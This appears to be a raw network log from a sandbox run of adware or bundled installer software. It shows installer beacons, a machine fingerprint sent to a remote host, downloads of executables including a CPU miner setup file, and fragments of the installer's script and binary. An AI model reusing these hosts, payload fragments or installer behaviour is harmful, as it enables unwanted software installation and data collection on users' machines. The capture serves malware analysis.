User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 5163
Connection: keep-alive
x-amz-id-2: AjQL4y8fLzMBXjBcq1riQXu6lrQMz5eIxeZcrvBO8swbGl1434gYRzLcefkTkD6R
x-amz-request-id: D515F0C8C6C1D704
x-amz-meta-s3fox-filesize: 5163
x-amz-meta-s3fox-modifiedtime: 1402217717749
Last-Modified: Mon, 09 Jun 2014 14:41:12 GMT
x-amz-version-id: KNAPX8e2AxH1Bx9jEBmu7jKCGa_97Tvk
ETag: "297eebd38313ee5b5ce0639f28ef2690"
Accept-Ranges: bytes
..2u..wJ0..0..1p..OO...j....u.`{..'.,.4...........m......&......0...p..O|f.s.....W<....v.5..]....{v....S....>..m..n}.cW7....^....].a.y....K.wR#q.........i\.C.>........%.e1>1..C..~...`.#.|....{w..t...%l"?..."......#...ft..Wt.;3|.-.J&..Mj.T]..[...S....x.5O.f.S.o.. I^.....Y.)......l.....6K.q.Jy~{R...t..z....d,........N.Nj...... Y... ....D...K...C......7p...V?.j..^..kH.i..G7.3...u..(.#..i..`....2 V....D...w..?.Wt .k.b.n.H.1..l4...p..U.T~.....T.@v.... ....iJ.f\C..O........-........<V...W.K.....\...7Qu.ny.5.N..ZE...|..f"...e.... R. .ha....e...5.O.O#LiV..F..q..ws...!.o...x.Gj.....LP..l..C'z.|.....t...(....!.RE.t..1yx{.$_..../i....E...I.a.......DL.>s.........R 0.E..R.1.Q...D..m=@...N8...R..|.v-?N...c9,..V-S6o2~..`.5.tk...f...v..<.0(..1.T...n..7...y.i.r... .._.P..c......IEND.B`.....
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?e38c9f6a9f564146 HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Feb 2015 00:37:01 GMT
If-None-Match: "80b4d90ca4fd01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Feb 2015 00:37:01 GMT
ETag: "80b4d90ca4fd01:0"
Cache-Control: max-age=604800
Date: Thu, 30 Apr 2015 23:11:47 GMT
Connection: keep-alive
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ClearnC HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0..
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.wpm HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:34 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.74 ms","message":"store 1 action and 0 update "}..0..
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ient HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:38 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
{"stats":"ok","time":"0.42 ms","message":"store 1 action and 0 update "}
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.RegWrite HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
{"stats":"ok","time":"1.66 ms","message":"store 1 action and 0 update "}
GET //MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwQSlx3KmUs= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:53 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=122104, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:54:04 GMT
Expires: Sat, 02 May 2015 10:54:04 GMT
ETag: "f8b69e2088ce500f8a2cd23376edbe2b1529a5ce"
Content-Length: 1810
Connection: close
Content-Type: application/ocsp-response
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?daa3db62222adfef HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Content-Length: 969
Date: Thu, 30 Apr 2015 23:11:51 GMT
Connection: keep-alive
<<< skipped >>>
GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.0.15</center>
</body>
</html>
POST /?pcrc=236440515&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 864
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=1901405883&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 1200
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=718955205&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=629602451&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=688063635&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=216881437&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 2352
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:30 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=1431802907&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 2256
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:30 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=489793, public, no-transform, must-revalidate
Last-Modified: Wed, 29 Apr 2015 15:15:07 GMT
Expires: Wed, 6 May 2015 15:15:07 GMT
Date: Thu, 30 Apr 2015 23:12:18 GMT
Connection: keep-alive
<<< skipped >>>
GET /v4/searchprotect/535559167_198339_B48A115F?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2253 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
{"stats":"ok","time":"1.59 ms","message":"store 2 action and 4 update "}
GET //MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCEMMb3zC402/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:12:18 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=119989, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:17:23 GMT
Expires: Sat, 02 May 2015 10:17:23 GMT
ETag: "c0773ca97a9364f110e8a1925adda329f5e6c722"
Content-Length: 1787
Connection: close
Content-Type: application/ocsp-response
<<< skipped >>>
POST /tdownload.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Host: VVV.lawfuldownload.com
version=1.1.2.41&s1=5844fe1867a9e3700b6c2f6fc517337ccbd4629e&t1=1430435409&campid=9664&prefix=amisetup2899
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup2899__9664.exe"
Content-Type: application/x-msdownload
Date: Thu, 30 Apr 2015 23:07:10 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup2899__9664.exe
Content-Length: 870912
Connection: keep-alive
<<< skipped >>>
POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 333
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.0.30319&OSversion=NT6.1SP1&Slv=&Sysid=915A4028688142931B5DDA64A4540CAD&Sysid1=066389C9740F80692FC30C6511692204&X64=Y&admin=Y&browser=IE.HTTP&cavp=&chver=35.0.1916.153&ci=9664&exe=amisetup2899__9664&ffver=29.0.1.5239&i=MyBestOffersTodayBR&lang_DfltUser=0409&netfs=3&s=Y&ts=1430435233&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:14 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Installer</title>
<base href="hXXp://VVV.amoninst.com:80/index.php" />
<script type="text/javascript" src="hXXp://cdn1.lawfuldownload.com/V19/amipb.js"></script>
<script type="text/javascript">
var g_amiobj = '', g_ami, g_updb = false, g_close = '0', g_additional_offer_list = '0';
var g_finish_install_button = '0';
var g_popup_install_all = '0';
var g_eula = '';
var g_post1 = '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3';
var g_icon = '';
var g_comps = [], g_pages = [], c, g_curPage = -1;
var g_cid = '9664';
var g_tid = '';
var g_cc = 'UA';
var g_lang = 'en';
var g_ip = '193.138.244.231';
var g_browser = 'ie';
var g_cnt = '3e5a8f2a30ab988ef7a611138130e98a';
var g_ver = '1.1.2.41';
var g_buttonImage = 1;
var g_thanks = 'thankyou.php';
var g_images = [];
var g_purl = 'hXXp://VVV.amoninst.com:80/pix.php';
var g_skipCats = 0;
var g_ieVer = '7.0';
var g_chVer = '35.0.1916.153';
var g_ffVer = '29.0.1.5239';
var g_netfs = -31;
var g_vert = 3;
var g_os = "NT6.1SP1";
var g_current_screen = '';
var g_custom_next_button_event = '0';
var g_custom_next_button = '0';
var g_install_all = 0;

function InitInstall()
{
 g_ami.AddThank
<<< skipped >>>
POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.amoninst.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 229
Connection: Keep-Alive
Cache-Control: no-cache
_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_updater=0&r_MyBestOffersTodayBR=0.01&updater=3&MyBestOffersTodayBR=2
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 30 Apr 2015 23:07:14 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 2409
Connection: keep-alive
<<< skipped >>>
GET /fp?alpha=A0E1QRo8DxMHXnc7GmsVAgVmTBoDHSMwWyRAZFVFRRE7FQkVajgxdXQFKDU/K0o1FmJxKl9DW2labB4MAwlIMG1tQHQoG1AVK0NZPBgXIntcXC4VWxdFfT8ScCc3AQYME2xKHVc4Mz59AwYsR1ZcUTUcZwA2U0NcAkZkHQ4QRgofYQs+MAxeBwAmQl97FVMnGFEMMwBBRFQxNQpwLicFUxhBYEccUi00N2QHCjkVSU8ENwQ0VycPQU5NGml9VFlBFxgkfSciDkQMQn8bGCYUAD9kJSklQgRBSWI9G3QvMQMEE0EqCxIxZGtjK0ZAOTMeCQJuQDNBWRdAURxDYx82EFEMGDhgMndVHFZpJkJSDklEXgVHKDYRW2RNYzkHdC8xCnQHY24layI/aEQOXW8YcQ== HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 0
GET /ii?alpha=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 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 84
9lqmClH8AOQOJOk5m3YQ8BfkHk7yVeEHI/9WwFpR4k64QEapeOMgY gK51lD6R30Cj/8co1UT6cmk/h0QTb/
POST /if?alpha=Bj59QGUAMTN5CB4JUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5pbFEADzc3GUkkZ09VPhh+GFZgVGhwKjg2XXsUPw1tIVdlTUJ5KAkMYmFHMVorewNNUx5hAHgXYXlUM180QxUFPGlpLiEIBGZEMGQ+FSdlRCJlED8VOSkqMiUPA10qDQpCQD8QBjR2XgkbOBhgBW87CQkATA4Qfl4uc181VikMPUo7fmAfPAEmeyJpJGpUaSRUJWtxe09tfX8mKQ8hUyUQETFGJgYAPm9UWmxrVjJEKWYSHwZJAwFyWH51TyYTK1ATSHg2L119V3Q0BmwrYFwjEhp1J0h6SCswWTspFCpWaWMrcBI1EFtraE0JeHcYNholMQNIQEUaQjsbOC4KLlJmAUAZbTw1WWVdYGpPMHs0DCpxBH0vHE9BZ2tpcyQPIlx0dBFOKBFFFiJrWAkIEilKKz4sURRgNVQTZU8kPHoORDpDFQMOZX0YJgY+eyYgGU1oV3cwezhKKWRubmU2JQQiZhEPUGk= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache
alpha=Bj59QGV0PEtiFVgoeCQLIWEuU3p8anxhCQEQP3YoRD5NKj8AEyFab1EhISptBn8hSjoHGEcf
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 84
9lqmClH8AOQOJOk5m3YQ8BfkHk7yVeEHI/9WwFpR4k64QEapeOMgY gK51lD6R30Cj/8co1UT6cmk/h0QTb/
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 41
{"status":"OK","url":null,"message":null}
GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 05:02:25 GMT
If-None-Match: "a1132b8ef65d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Tue, 24 Mar 2015 05:02:25 GMT
ETag: "a1132b8ef65d01:0"
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:47 GMT
Connection: keep-alive
GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Tue, 14 Apr 2015 05:02:07 GMT
Accept-Ranges: bytes
ETag: "2711f7277076d01:0"
Server: Microsoft-IIS/8.5
VTag: 279782516600000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 554
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:12:18 GMT
Connection: keep-alive
0..&0......0...*.H........0y1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1#0!..U....Microsoft Code Signing PCA..150413163223Z..150713045223Z.a0_0...U.#..0..........X..7.3...L...0... .....7.........0...U......Z0... .....7......150712164223Z0...*.H.............WK....e.\.-.n......./......."]..E!.. //=...[....w... ..........#...[.l.J..f|..... .s......w...J._.......3.[..#.z....ko.I..Q{....e.nV......F..d}..rF\H.jlH]dQ.E....x......W............j....&L. 2.$.?...X?.#.(.....pK.v.......y..r....t......=.AW......K.G.gJD.b...
GET /mobile/mt-core.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:07 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 18:46:26 GMT
ETag: "1448627-161ce-49dac90326480"
Accept-Ranges: bytes
Content-Length: 90574
Connection: close
Content-Type: application/x-javascript
/*.---.MooTools: the javascript framework..web build:. - hXXp://mootools.net/core/7c56cfef9dddcf170a5d68e3fb61cfd7..packager build:. - packager build Core/Core Core/Array Core/String Core/Number Core/Function Core/Object Core/Event Core/Browser Core/Class Core/Class.Extras Core/Slick.Parser Core/Slick.Finder Core/Element Core/Element.Style Core/Element.Event Core/Element.Dimensions Core/Fx Core/Fx.CSS Core/Fx.Tween Core/Fx.Morph Core/Fx.Transitions Core/Request Core/Request.HTML Core/Request.JSON Core/Cookie Core/JSON Core/DOMReady Core/Swiff..copyrights:. - [MooTools](hXXp://mootools.net)..licenses:. - [MIT License](http://mootools.net/license.txt).....*/.(function(){this.MooTools={version:"1.3.1",build:"af48c8d589f43f32212f9bb8ff68a127e6a3ba6c"};var e=this.typeOf=function(i){if(i==null){return"null";}if(i.$family){return i.$family();.}if(i.nodeName){if(i.nodeType==1){return"element";}if(i.nodeType==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace";}}else{if(typeof i.length=="number"){if(i.callee){return"arguments";.}if("item" in i){return"collection";}}}return typeof i;};var u=this.instanceOf=function(w,i){if(w==null){return false;}var v=w.$constructor||w.constructor;.while(v){if(v===i){return true;}v=v.parent;}return w instanceof i;};var f=this.Function;var r=true;for(var q in {toString:1}){r=null;}if(r){r=["hasOwnProperty","valueOf","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","constructor"];.}f.prototype.overloadSetter=function(v){var i=this;return function(x,w){if(x==null){
<<< skipped >>>
GET /CPUminer/cpuminer-x11opt-setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:08 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427702688"
Last-Modified: Mon, 30 Mar 2015 08:04:48 GMT
Cache-Control: max-age=73285
Content-Length: 2586343
Content-Type: application/octet-stream
X-HW: 1430435229.dop007.am4.t,1430435228.cds054.am4.c
Content-Disposition: attachment; filename="cpuminer-x11opt-setup.exe"
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........0.......p....@..........................@............@..................................s...........B...........................................................................p...............................text...|Z.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc....B.......D...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....6B..H.P.u..u..u....r@..B...SV.5.6B..E.WP.u....r@..e...E..E.P.u....r@..}..e....Lp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@..u....E..9}...w....~X.te.v4..Dp@....E.tU.}.j.W.E......E.......@p@..vXW..Hp@..u..5<p@.W...E..E.h ...Pj.h..B.W...r@..u.W...u....E.P.u...\r@._^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /V19/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.amoninst.com/index.php
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: cdn1.lawfuldownload.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 61399
Connection: keep-alive
Date: Fri, 24 Apr 2015 08:51:14 GMT
Last-Modified: Thu, 19 Feb 2015 14:37:18 GMT
ETag: "52bb6eb78bfd9436ad34be6fc97eae8c"
Accept-Ranges: bytes
Server: AmazonS3
Age: 61933
X-Cache: Hit from cloudfront
Via: 1.1 1215b20e825091002cc9421604422697.cloudfront.net (CloudFront)
X-Amz-Cf-Id: xvLGUt83RdPMDlFA2UmHO8rLncLUKhDgc5SLuQQXMezdvUXxw9WTfg==
..//<!-- ../* Progress bar */..var g_AmiPbs = new Array();..var g_AmiPbsEx = new Array();..var g_interval = 0;..var g_initComp = 0;..var g_possibleComps = [];..var g_reportedComps = [];..var g_removedComps = [];....function LogMessage(message) {.. try {.. g_ami.Log(message);.. }.. catch (excpt) { }..}..function IsDeclined(name) {.. var declined = 0;.. for (var i = 0; i < g_removedComps.length; i++) {.. if (g_removedComps[i] == name) {.. declined = 1;.. break;.. }.. }.. return declined;..}..function UpdateSkipStatus(sn) {.. if (g_testa && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn)) {.. if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {.. g_ami.WriteProfileString(g_testf, '', sn, 'S');.. }.. }..}..function ShortNameFromName(name) {.. for (c = 0; c < g_comps.length; c++) {.. if (g_comps[c].name == name) {.. return g_comps[c].sn;.. }.. }.. return name;..}..function UpdateComponentsStatus() {.. LogMessage('UpdateComponentsStatus function started');.. for (var j = 0; j < g_possibleComps.length; j++) {.. var reported = 0;.. if (g_possibleComps[j].sn == 'updater') {.. continue;.. }.. for (var i = 0; i < g_reportedComps.length; i++) {.. if (g_reportedComps[i].sn == g_possibleComps[j].sn) {.. reported = 1;.. break;.. }.. }.. if
<<< skipped >>>
GET /v4/sof-installer/MAS_WIN7X64_adm_1FEBFBFF000306C3?action=pcm.chromesyn.exist HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
